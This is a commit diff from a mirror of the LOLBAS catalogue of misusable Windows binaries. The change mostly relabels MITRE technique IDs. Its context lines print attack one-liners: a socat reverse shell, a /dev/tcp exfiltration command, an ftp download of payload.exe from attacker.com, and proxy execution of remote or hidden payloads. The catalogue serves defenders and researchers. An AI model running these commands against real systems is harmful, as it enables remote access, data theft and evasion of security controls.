mirror of
https://github.com/LOLBAS-Project/LOLBAS
synced 2024-12-25 14:29:24 +01:00
More changes (mainly changing some T1218 instances to T1202)
This commit is contained in:
parent
2577066af9
commit
bc51cb4e03
@ -9,28 +9,28 @@ Commands:
|
|||||||
Usecase: Performs execution of specified file, can be used as a defensive evasion.
|
Usecase: Performs execution of specified file, can be used as a defensive evasion.
|
||||||
Category: Execute
|
Category: Execute
|
||||||
Privileges: User
|
Privileges: User
|
||||||
MitreID: T1218
|
MitreID: T1202
|
||||||
OperatingSystem: Windows 10
|
OperatingSystem: Windows 10
|
||||||
- Command: bash.exe -c "socat tcp-connect:192.168.1.9:66 exec:sh,pty,stderr,setsid,sigint,sane"
|
- Command: bash.exe -c "socat tcp-connect:192.168.1.9:66 exec:sh,pty,stderr,setsid,sigint,sane"
|
||||||
Description: Executes a reverseshell
|
Description: Executes a reverseshell
|
||||||
Usecase: Performs execution of specified file, can be used as a defensive evasion.
|
Usecase: Performs execution of specified file, can be used as a defensive evasion.
|
||||||
Category: Execute
|
Category: Execute
|
||||||
Privileges: User
|
Privileges: User
|
||||||
MitreID: T1218
|
MitreID: T1202
|
||||||
OperatingSystem: Windows 10
|
OperatingSystem: Windows 10
|
||||||
- Command: bash.exe -c 'cat file_to_exfil.zip > /dev/tcp/192.168.1.10/24'
|
- Command: bash.exe -c 'cat file_to_exfil.zip > /dev/tcp/192.168.1.10/24'
|
||||||
Description: Exfiltrate data
|
Description: Exfiltrate data
|
||||||
Usecase: Performs execution of specified file, can be used as a defensive evasion.
|
Usecase: Performs execution of specified file, can be used as a defensive evasion.
|
||||||
Category: Execute
|
Category: Execute
|
||||||
Privileges: User
|
Privileges: User
|
||||||
MitreID: T1218
|
MitreID: T1202
|
||||||
OperatingSystem: Windows 10
|
OperatingSystem: Windows 10
|
||||||
- Command: bash.exe -c calc.exe
|
- Command: bash.exe -c calc.exe
|
||||||
Description: Executes calc.exe from bash.exe
|
Description: Executes calc.exe from bash.exe
|
||||||
Usecase: Performs execution of specified file, can be used to bypass Application Whitelisting.
|
Usecase: Performs execution of specified file, can be used to bypass Application Whitelisting.
|
||||||
Category: AWL Bypass
|
Category: AWL Bypass
|
||||||
Privileges: User
|
Privileges: User
|
||||||
MitreID: T1218
|
MitreID: T1202
|
||||||
OperatingSystem: Windows 10
|
OperatingSystem: Windows 10
|
||||||
Full_Path:
|
Full_Path:
|
||||||
- Path: C:\Windows\System32\bash.exe
|
- Path: C:\Windows\System32\bash.exe
|
||||||
|
@ -16,7 +16,7 @@ Commands:
|
|||||||
Usecase: Use diskshadow to bypass defensive counter measures
|
Usecase: Use diskshadow to bypass defensive counter measures
|
||||||
Category: Execute
|
Category: Execute
|
||||||
Privileges: User
|
Privileges: User
|
||||||
MitreID: T1003
|
MitreID: T1202
|
||||||
OperatingSystem: Windows server
|
OperatingSystem: Windows server
|
||||||
Full_Path:
|
Full_Path:
|
||||||
- Path: C:\Windows\System32\diskshadow.exe
|
- Path: C:\Windows\System32\diskshadow.exe
|
||||||
|
@ -9,14 +9,14 @@ Commands:
|
|||||||
Usecase: Performs execution of specified file with explorer parent process breaking the process tree, can be used for defense evasion.
|
Usecase: Performs execution of specified file with explorer parent process breaking the process tree, can be used for defense evasion.
|
||||||
Category: Execute
|
Category: Execute
|
||||||
Privileges: User
|
Privileges: User
|
||||||
MitreID: T1218
|
MitreID: T1202
|
||||||
OperatingSystem: Windows XP, Windows 7, Windows 8, Windows 8.1, Windows 10
|
OperatingSystem: Windows XP, Windows 7, Windows 8, Windows 8.1, Windows 10
|
||||||
- Command: explorer.exe C:\Windows\System32\notepad.exe
|
- Command: explorer.exe C:\Windows\System32\notepad.exe
|
||||||
Description: Execute calc.exe with the parent process spawning from a new instance of explorer.exe
|
Description: Execute calc.exe with the parent process spawning from a new instance of explorer.exe
|
||||||
Usecase: Performs execution of specified file with explorer parent process breaking the process tree, can be used for defense evasion.
|
Usecase: Performs execution of specified file with explorer parent process breaking the process tree, can be used for defense evasion.
|
||||||
Category: Execute
|
Category: Execute
|
||||||
Privileges: User
|
Privileges: User
|
||||||
MitreID: T1218
|
MitreID: T1202
|
||||||
OperatingSystem: Windows 10 (Tested)
|
OperatingSystem: Windows 10 (Tested)
|
||||||
Full_Path:
|
Full_Path:
|
||||||
- Path: C:\Windows\explorer.exe
|
- Path: C:\Windows\explorer.exe
|
||||||
|
@ -9,7 +9,7 @@ Commands:
|
|||||||
Usecase: Use forfiles to start a new process to evade defensive counter measures
|
Usecase: Use forfiles to start a new process to evade defensive counter measures
|
||||||
Category: Execute
|
Category: Execute
|
||||||
Privileges: User
|
Privileges: User
|
||||||
MitreID: T1218
|
MitreID: T1202
|
||||||
OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10
|
OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10
|
||||||
- Command: forfiles /p c:\windows\system32 /m notepad.exe /c "c:\folder\normal.dll:evil.exe"
|
- Command: forfiles /p c:\windows\system32 /m notepad.exe /c "c:\folder\normal.dll:evil.exe"
|
||||||
Description: Executes the evil.exe Alternate Data Stream (AD) since there is a match for notepad.exe in the c:\windows\system32 folder.
|
Description: Executes the evil.exe Alternate Data Stream (AD) since there is a match for notepad.exe in the c:\windows\system32 folder.
|
||||||
|
@ -9,7 +9,7 @@ Commands:
|
|||||||
Usecase: Spawn new process using ftp.exe. Ftp.exe runs cmd /C YourCommand
|
Usecase: Spawn new process using ftp.exe. Ftp.exe runs cmd /C YourCommand
|
||||||
Category: Execute
|
Category: Execute
|
||||||
Privileges: User
|
Privileges: User
|
||||||
MitreID: T1218
|
MitreID: T1202
|
||||||
OperatingSystem: Windows 7, Windows 8, Windows 8.1, Windows 10
|
OperatingSystem: Windows 7, Windows 8, Windows 8.1, Windows 10
|
||||||
- Command: cmd.exe /c "@echo open attacker.com 21>ftp.txt&@echo USER attacker>>ftp.txt&@echo PASS PaSsWoRd>>ftp.txt&@echo binary>>ftp.txt&@echo GET /payload.exe>>ftp.txt&@echo quit>>ftp.txt&@ftp -s:ftp.txt -v"
|
- Command: cmd.exe /c "@echo open attacker.com 21>ftp.txt&@echo USER attacker>>ftp.txt&@echo PASS PaSsWoRd>>ftp.txt&@echo binary>>ftp.txt&@echo GET /payload.exe>>ftp.txt&@echo quit>>ftp.txt&@ftp -s:ftp.txt -v"
|
||||||
Description: Download
|
Description: Download
|
||||||
|
@ -9,14 +9,14 @@ Commands:
|
|||||||
Usecase: Add local group policy logon script to execute file and hide from defensive counter measures
|
Usecase: Add local group policy logon script to execute file and hide from defensive counter measures
|
||||||
Category: Execute
|
Category: Execute
|
||||||
Privileges: Administrator
|
Privileges: Administrator
|
||||||
MitreID: T1216
|
MitreID: T1218
|
||||||
OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10
|
OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10
|
||||||
- Command: Gpscript /startup
|
- Command: Gpscript /startup
|
||||||
Description: Executes startup scripts configured in Group Policy
|
Description: Executes startup scripts configured in Group Policy
|
||||||
Usecase: Add local group policy logon script to execute file and hide from defensive counter measures
|
Usecase: Add local group policy logon script to execute file and hide from defensive counter measures
|
||||||
Category: Execute
|
Category: Execute
|
||||||
Privileges: Administrator
|
Privileges: Administrator
|
||||||
MitreID: T1216
|
MitreID: T1218
|
||||||
OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10
|
OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10
|
||||||
Full_Path:
|
Full_Path:
|
||||||
- Path: C:\Windows\System32\gpscript.exe
|
- Path: C:\Windows\System32\gpscript.exe
|
||||||
|
@ -16,7 +16,7 @@ Commands:
|
|||||||
Usecase: Execute process with HH.exe
|
Usecase: Execute process with HH.exe
|
||||||
Category: Execute
|
Category: Execute
|
||||||
Privileges: User
|
Privileges: User
|
||||||
MitreID: T1216
|
MitreID: T1202
|
||||||
OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10
|
OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10
|
||||||
Full_Path:
|
Full_Path:
|
||||||
- Path: C:\Windows\System32\hh.exe
|
- Path: C:\Windows\System32\hh.exe
|
||||||
|
@ -9,21 +9,21 @@ Commands:
|
|||||||
Usecase: Proxy execution of binary
|
Usecase: Proxy execution of binary
|
||||||
Category: Execute
|
Category: Execute
|
||||||
Privileges: User
|
Privileges: User
|
||||||
MitreID: T1218
|
MitreID: T1202
|
||||||
OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10
|
OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10
|
||||||
- Command: pcalua.exe -a \\server\payload.dll
|
- Command: pcalua.exe -a \\server\payload.dll
|
||||||
Description: Open the target .DLL file with the Program Compatibilty Assistant.
|
Description: Open the target .DLL file with the Program Compatibilty Assistant.
|
||||||
Usecase: Proxy execution of remote dll file
|
Usecase: Proxy execution of remote dll file
|
||||||
Category: Execute
|
Category: Execute
|
||||||
Privileges: User
|
Privileges: User
|
||||||
MitreID: T1218
|
MitreID: T1202
|
||||||
OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10
|
OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10
|
||||||
- Command: pcalua.exe -a C:\Windows\system32\javacpl.cpl -c Java
|
- Command: pcalua.exe -a C:\Windows\system32\javacpl.cpl -c Java
|
||||||
Description: Open the target .CPL file with the Program Compatibility Assistant.
|
Description: Open the target .CPL file with the Program Compatibility Assistant.
|
||||||
Usecase: Execution of CPL files
|
Usecase: Execution of CPL files
|
||||||
Category: Execute
|
Category: Execute
|
||||||
Privileges: User
|
Privileges: User
|
||||||
MitreID: T1218
|
MitreID: T1202
|
||||||
OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10
|
OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10
|
||||||
Full_Path:
|
Full_Path:
|
||||||
- Path: C:\Windows\System32\pcalua.exe
|
- Path: C:\Windows\System32\pcalua.exe
|
||||||
|
@ -9,10 +9,10 @@ Commands:
|
|||||||
Usecase: Execute binary through proxy binary to evade defensive counter measurments
|
Usecase: Execute binary through proxy binary to evade defensive counter measurments
|
||||||
Category: Execute
|
Category: Execute
|
||||||
Privileges: User
|
Privileges: User
|
||||||
MitreID: T1218
|
MitreID: T1202
|
||||||
OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10
|
OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10
|
||||||
- Command: ScriptRunner.exe -appvscript "\\fileserver\calc.cmd"
|
- Command: ScriptRunner.exe -appvscript "\\fileserver\calc.cmd"
|
||||||
Description: Executes calc.cmde from remote server
|
Description: Executes calc.cmd from remote server
|
||||||
Usecase: Execute binary through proxy binary from external server to evade defensive counter measurments
|
Usecase: Execute binary through proxy binary from external server to evade defensive counter measurments
|
||||||
Category: Execute
|
Category: Execute
|
||||||
Privileges: User
|
Privileges: User
|
||||||
|
@ -9,7 +9,7 @@ Commands:
|
|||||||
Usecase: Proxy execution
|
Usecase: Proxy execution
|
||||||
Category: Execute
|
Category: Execute
|
||||||
Privileges: User
|
Privileges: User
|
||||||
MitreID: T1216
|
MitreID: T1216.001
|
||||||
OperatingSystem: Windows 10
|
OperatingSystem: Windows 10
|
||||||
Full_Path:
|
Full_Path:
|
||||||
- Path: C:\Windows\System32\Printing_Admin_Scripts\en-US\pubprn.vbs
|
- Path: C:\Windows\System32\Printing_Admin_Scripts\en-US\pubprn.vbs
|
||||||
|
Loading…
Reference in New Issue
Block a user